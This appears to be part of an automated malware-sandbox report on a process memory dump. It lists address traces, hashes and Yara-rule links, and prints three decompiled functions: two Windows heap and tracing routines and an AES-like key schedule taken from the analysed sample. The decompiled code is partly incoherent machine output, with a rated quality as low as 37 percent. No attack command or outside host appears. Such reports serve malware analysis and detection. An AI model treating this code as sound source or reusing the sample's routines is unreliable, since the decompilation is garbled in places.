0x030aba23
0x030aba24
0x030aba27
0x030aba2a
0x030aba2b
0x030aba2e
0x030aba30
0x030aba37
0x030aba3f
0x030aba9c
0x030abaa2
0x030abb13
0x030abb15
0x030abaae
0x030abaae
0x030abab3
0x030abab5
0x030ababa
0x030abac8
0x030abac8
0x030ababa
0x030abacd
0x030abacf
0x00000000
0x030abacf
0x030abb1a
0x00000000
0x030abb1c
0x030abaa7
0x030abb11
0x00000000
0x030abb11
0x030abaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x030aba41
0x030aba41
0x030aba41
0x030aba58
0x030aba5d
0x030aba62
0x00000000
0x00000000
0x030aba64
0x030aba67
0x030aba68
0x030aba69
0x030aba6c
0x030aba6f
0x030aba71
0x030aba78
0x030aba80
0x00000000
0x00000000
0x030aba90
0x030aba90
0x030aba97
0x00000000
0x030aba97
0x030ab9f5
0x030ab9f7
0x030ab9f7
0x030ab9fa
0x030aba03
0x030aba07
0x030aba0c
0x030aba10
0x030aba17
0x00000000
0x030ab9f7
0x030ab9a6
0x030ab9a8
0x030ab9af
0x030ab9b3
0x00000000
0x00000000
0x030ab9b9
0x00000000
0x030ab9b9
0x030ab94d
0x030ab98f
0x030ab995
0x030ab999
0x030ab960
0x030ab967
0x030ab968
0x030ab96a
0x00000000
0x030ab96a
0x030ab99b
0x030ab99e
0x00000000
0x00000000
0x00000000
0x030ab99e
0x030ab951
0x030ab954
0x030ab95a
0x030ab95e
0x030ab972
0x030ab979
0x030ab97d
0x030ab97f
0x030ab980
0x030ab982
0x030ab984
0x00000000
0x030ab984
0x00000000
0x030ab926
0x00000000
0x030ab926

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc5d041c70c17d3c29018ac4130accb20742efda3cbd3a6dfab405020d42a93
Instruction ID: 256e28b246b96a84af2178d20235f707dc69abc0f0eefcad20acc82eb5fba6fe
Opcode Fuzzy Hash: 6bc5d041c70c17d3c29018ac4130accb20742efda3cbd3a6dfab405020d42a93
Instruction Fuzzy Hash: 8B71F436242B01EFD731DFACD844F6ABBE5EF84720F144928E5558B6A0DBB5E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03096DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E03096DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03096B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03037D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03059AE0();
					_t87 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0309795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0309795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0309795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0309795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03034620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03096B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03096B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03096B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03096B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03037D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03059AE0();
								L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03032400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03032400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03032400( &_v52);
							}
							if(_v28 >= 0) {
								return L03032400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x03096dd4
0x03096dde
0x03096de1
0x03096de3
0x03096de6
0x03096de9
0x03096dec
0x03096def
0x03096df2
0x03096df5
0x03096dfe
0x03096e04
0x03096e09
0x03096e0d
0x03096e18
0x03096e1b
0x03096e22
0x03096e2d
0x03096e30
0x03096e36
0x03096e42
0x03096e4d
0x03096e50
0x03096e55
0x03096e5c
0x03096e6e
0x03096e5e
0x03096e67
0x03096e67
0x03096e73
0x03096e74
0x03096e77
0x03096e7c
0x03096e7d
0x03096e8e
0x03096e93
0x03096e9c
0x03096ea8
0x03096eab
0x03096eac
0x03096eb3
0x03096ecd
0x03096edc
0x03096ee2
0x03096ee5
0x03096ef2
0x03096efb
0x03096f01
0x03096f06
0x03096f0b
0x03096f11
0x03096f1a
0x03096f22
0x03096f26
0x03096f26
0x03096f33
0x03096f41
0x03096f44
0x03096f47
0x03096f54
0x03096f65
0x03096f77
0x03096f7c
0x03096f82
0x03096f91
0x03096f99
0x03096fa3
0x03096fae
0x03096fae
0x03096fba
0x03096fbb
0x03096fbc
0x03096fc1
0x03096fc2
0x03096fd3
0x03096fd8
0x03096fd8
0x03096fdf
0x03096fe8
0x03096fee
0x03096fee
0x03096ff5
0x03096ffb
0x03096ffb
0x03097004
0x00000000
0x0309700a
0x03097004
0x03096eb3
0x03096e9c
0x03097015

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: a976e19202789c2e2e23a76c32c8f90513e83ff654c59bafe5c5d9e92a1247d3
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 62717C75A01209EFDF11DFA5C984AEEFBB9FF88710F14446AE504AB250DB30EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 030D1002, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E030D1002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x3105898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x31058b0 = _t128;
								 *0x31058b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x31058b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x31058bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x31058bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x31058b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x3105898 = 7;
										return _t75;
									} else {
										 *0x3105898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x3105898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x030d1002
0x030d100c
0x030d100f
0x030d1012
0x030d1018
0x00000000
0x030d102e
0x030d1030
0x00000000
0x030d1032
0x030d1032
0x030d1038
0x030d1038
0x030d121e
0x030d11ff
0x030d1205
0x030d1207
0x030d120c
0x030d120e
0x030d1210
0x030d1212
0x030d1212
0x030d1210
0x030d121c
0x030d121c
0x030d1228
0x030d1228
0x030d101c
0x030d101c
0x030d101c
0x030d101f
0x030d1022
0x030d1025
0x030d102c
0x030d102c
0x00000000
0x030d102c
0x030d1027
0x030d102a
0x030d103f
0x030d103f
0x030d1042
0x030d1044
0x030d1047
0x030d1049
0x030d104c
0x030d104e
0x030d1088
0x030d1088
0x030d108a
0x030d108d
0x030d108f
0x030d1091
0x030d1091
0x030d1093
0x030d1095
0x030d1097
0x030d10c8
0x030d10cb
0x030d10ce
0x030d10d0
0x030d10f4
0x030d10f4
0x030d10fa
0x030d1100
0x030d1102
0x030d1150
0x030d1150
0x030d1154
0x030d1167
0x030d116a
0x030d116a
0x030d1156
0x030d1156
0x030d1158
0x030d115b
0x030d115d
0x030d115f
0x030d115f
0x030d115f
0x030d1162
0x030d1162
0x030d116c
0x030d116f
0x030d1171
0x030d117b
0x030d117b
0x030d117d
0x030d1183
0x030d1183
0x030d1186
0x030d1188
0x030d1199
0x030d118a
0x030d118a
0x030d118c
0x030d118f
0x030d1191
0x030d1191
0x030d1191
0x030d1194
0x030d1194
0x030d119c
0x030d11a2
0x030d11a8
0x030d11ac
0x030d11af
0x030d11c7
0x030d11b1
0x030d11b1
0x030d11b4
0x030d11b7
0x030d11b9
0x030d11b9
0x030d11b9
0x030d11bc
0x030d11c2
0x030d11c2
0x030d11cb
0x030d11ce
0x030d11d4
0x030d11e7
0x030d11ed
0x030d11ef
0x00000000
0x00000000
0x030d11f1
0x00000000
0x030d11d6
0x030d11d6
0x00000000
0x030d11d6
0x030d11d4
0x030d1104
0x030d1106
0x00000000
0x00000000
0x030d1108
0x030d110c
0x030d111d
0x030d110e
0x030d110e
0x030d1110
0x030d1113
0x030d1115
0x030d1115
0x030d1115
0x030d1118
0x030d1118
0x030d1126
0x030d113a
0x030d113d
0x030d113f
0x00000000
0x030d1141
0x030d1141
0x00000000
0x030d1141
0x030d113f
0x030d10d6
0x030d10d9
0x030d10dd
0x030d10e3
0x030d10e6
0x030d10e9
0x00000000
0x00000000
0x030d10ee
0x030d10f0
0x030d10f2
0x00000000
0x00000000
0x00000000
0x030d10f2
0x00000000
0x030d1099
0x030d1099
0x030d109c
0x030d109c
0x030d109e
0x030d10a0
0x030d10b3
0x030d10a2
0x030d10a2
0x030d10a4
0x030d10a7
0x030d10a9
0x030d10ab
0x030d10ab
0x030d10ab
0x030d10ae
0x030d10ae
0x030d10b6
0x030d10b9
0x00000000
0x00000000
0x030d10be
0x030d10c1
0x030d10c3
0x00000000
0x00000000
0x00000000
0x030d10c3
0x030d10c5
0x00000000
0x030d10c5
0x030d1097
0x030d1050
0x030d1053
0x030d1056
0x030d1059
0x030d105c
0x030d105e
0x030d1060
0x030d1062
0x030d1064
0x030d1064
0x030d1062
0x030d1066
0x030d1069
0x030d106b
0x030d106d
0x030d106f
0x030d1076
0x030d1076
0x030d1076
0x00000000
0x030d1076
0x030d1071
0x030d1074
0x00000000
0x00000000
0x00000000
0x030d1074
0x030d1079
0x030d1079
0x030d107b
0x030d107b
0x030d107f
0x030d1082
0x030d1085
0x00000000
0x030d1085
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a105062ea3bafb6aca993ebfad60d32859d24efa02f830c4b59026b85b7f908d
Instruction ID: 0f579e5df2d9566884667b044373b882e68b624c07fcefcbbb98c4c18cc5a191
Opcode Fuzzy Hash: a105062ea3bafb6aca993ebfad60d32859d24efa02f830c4b59026b85b7f908d
Instruction Fuzzy Hash: 89718138A02762DBDBACDF5AD48067AF7F1FF44305B58486ED89287640DBB1A990CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00402D88, Relevance: .2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E00402D88(void* __esi, void* __eflags, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20) {
				char _v256;
				char _v272;
				intOrPtr _v593771;
				signed int __ebx;
				signed int __edi;
				void* __ebp;
				intOrPtr* _t75;
				intOrPtr _t77;
				intOrPtr* _t78;
				void* _t84;
				void* _t87;
				void* _t89;
				void* _t93;
				void* _t95;

				_t91 = __esi;
				asm("aaa");
				if(__eflags > 0) {
					 *((intOrPtr*)(_t89 + 1)) =  *((intOrPtr*)(_t89 + 1)) - _t93;
					 *_t75 =  *_t75 + _t84;
					_v593771 = _v593771 + _t84;
					_t77 =  *((intOrPtr*)(_t87 - 0x73))();
					_t6 = _t95 + _t77;
					_t78 =  *_t6;
					 *_t6 = _t77;
					 *_t78 =  *_t78 + _t78;
					_push(_t78);
					E00419C60();
					_t9 = _t91 + 0x804; // 0x804
					E00419C60(_t9,  &_v256, 0x100);
					_t11 = _t91 + 0x904; // 0x904
					E00419C60(_t11,  &_v272, 0xc);
					return __esi;
				} else {
					asm("hlt");
					__esi = __esi + 1;
					__eflags = __esi;
					if(__esi == 0) {
						__ebp = __esp;
						__ecx = _a12;
						__eax =  *__ecx;
						__edx = _a8;
						_push(__ebx);
						_push(__esi);
						_push(__edi);
						__esi = __eax;
						asm("ror esi, 0x8");
						__esi = __eax & 0xff00ff00;
						asm("rol eax, 0x8");
						__eflags = __esi;
					}
					asm("lock mov [edx], esi");
					__esi =  *(__ecx + 4);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 4) = __edi;
					__esi =  *(__ecx + 8);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 8) = __edi;
					__esi =  *(__ecx + 0xc);
					__eax = __edx + 4;
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0xc) = __edi;
					__esi =  *(__ecx + 0x10);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0x10) = __edi;
					__esi =  *(__ecx + 0x14);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0x14) = __edi;
					__esi =  *(__ecx + 0x18);
					__edi = __esi;
					asm("ror edi, 0x8");
					__edi = __esi & 0xff00ff00;
					asm("rol esi, 0x8");
					 *(__edx + 0x18) = __edi;
					__ecx =  *(__ecx + 0x1c);
					__esi = __ecx;
					asm("ror esi, 0x8");
					__esi = __ecx & 0xff00ff00;
					asm("rol ecx, 0x8");
					__esi = __esi | __ecx;
					__eflags = _a20 - 0x100;
					 *(__edx + 0x1c) = __esi;
					if(_a20 != 0x100) {
						L8:
						_pop(__edi);
						_pop(__esi);
						__eax = __eax | 0xffffffff;
						__eflags = __eax;
						_pop(__ebx);
						return __eax;
					} else {
						__esi = _a8;
						__ebx = 0;
						__eflags = 0;
						_a16 = 0;
						while(1) {
							__edi =  *(__eax + 0x18);
							 *(__esi + __ebx + 0x904) & 0x000000ff = ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x10;
							__edi = __edi >> 0x10;
							__ecx = __edi >> 0x00000010 & 0x000000ff;
							__ecx =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4);
							__ecx =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000;
							__ecx =  *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010;
							__edi = __edi >> 8;
							__edx = __edi >> 0x00000008 & 0x000000ff;
							__edx =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4);
							__edx =  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 8;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000;
							__edi = __edi >> 0x18;
							__edx = __edi >> 0x00000018 & 0x000000ff;
							__edx =  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff;
							__edx = __edi;
							__edx = __edi & 0x000000ff;
							__edx =  *(__esi + 4 + (__edi & 0x000000ff) * 4);
							__edx =  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00;
							__ecx = ( *(__esi + 4 + (__edi >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(__esi + __ebx + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(__esi + 4 + (__edi >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(__esi + 5 + (__edi >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(__esi + 4 + (__edi & 0x000000ff) * 4) & 0x0000ff00 ^  *(__eax - 4);
							__edx =  *__eax;
							__edx =  *__eax ^ __ecx;
							 *(__eax + 0x1c) = __ecx;
							__ecx =  *(__eax + 4);
							__ecx =  *(__eax + 4) ^ __edx;
							 *(__eax + 0x20) = __edx;
							__edx =  *(__eax + 8);
							__edx =  *(__eax + 8) ^ __ecx;
							 *(__eax + 0x24) = __ecx;
							 *(__eax + 0x28) = __edx;
							__eflags = __ebx - 6;
							if(__ebx == 6) {
								break;
							}
							__edx = __edx >> 0x18;
							__ecx = __edx >> 0x00000018 & 0x000000ff;
							__ecx =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4);
							__edx = __edx >> 0x10;
							__ebx = __edx >> 0x00000010 & 0x000000ff;
							__ebx =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4);
							__ecx =  *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000;
							__ebx =  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 8;
							__ecx = ( *(__esi + 4 + (__edx >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(__esi + 4 + (__edx >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000;
							__edx = __edx >> 8;
							__ebx = __edx >> 0x00000008 & 0x000000ff;
							__ebx =  *(__esi + 4 + (__edx >> 0x00000008 & 0x000000ff) * 4);
							__edx = __edx & 0x000000ff;
							__edx =  *(__esi + 5 + __edx * 4) & 0x000000ff;
							__ecx = __ecx ^ __ebx;
							__ebx = _a16;
							__ecx = __ecx ^ __edx;
							__ecx = __ecx ^  *(__eax + 0xc);
							__edx =  *(__eax + 0x10);
							__edx =  *(__eax + 0x10) ^ __ecx;
							 *(__eax + 0x2c) = __ecx;
							__ecx =  *(__eax + 0x14);
							__ecx =  *(__eax + 0x14) ^ __edx;
							 *(__eax + 0x34) = __ecx;
							__ecx = __ecx ^ __edi;
							__ebx = _a16 + 1;
							 *(__eax + 0x30) = __edx;
							 *(__eax + 0x38) = __ecx;
							__eax = __eax + 0x20;
							_a16 = __ebx;
							__eflags = __ebx - 7;
							if(__ebx < 7) {
								continue;
							} else {
								goto L8;
							}
							goto L10;
						}
						_pop(__edi);
						_pop(__esi);
						__eax = 0xe;
						_pop(__ebx);
						return 0xe;
					}
				}
				L10:
			}

0x00402d88
0x00402d88
0x00402d89
0x00402d33
0x00402d36
0x00402d3b
0x00402d41
0x00402d44
0x00402d44
0x00402d44
0x00402d47
0x00402d49
0x00402d4a
0x00402d5b
0x00402d62
0x00402d70
0x00402d77
0x00402d86
0x00402d8b
0x00402d8b
0x00402d8c
0x00402d8c
0x00402d8e
0x00402d91
0x00402d93
0x00402d96
0x00402d98
0x00402d9b
0x00402d9c
0x00402d9d
0x00402d9e
0x00402da0
0x00402da3
0x00402da9
0x00402db1
0x00402db1
0x00402db2
0x00402db5
0x00402db8
0x00402dba
0x00402dbd
0x00402dc3
0x00402dce
0x00402dd1
0x00402dd4
0x00402dd6
0x00402dd9
0x00402ddf
0x00402dea
0x00402ded
0x00402df0
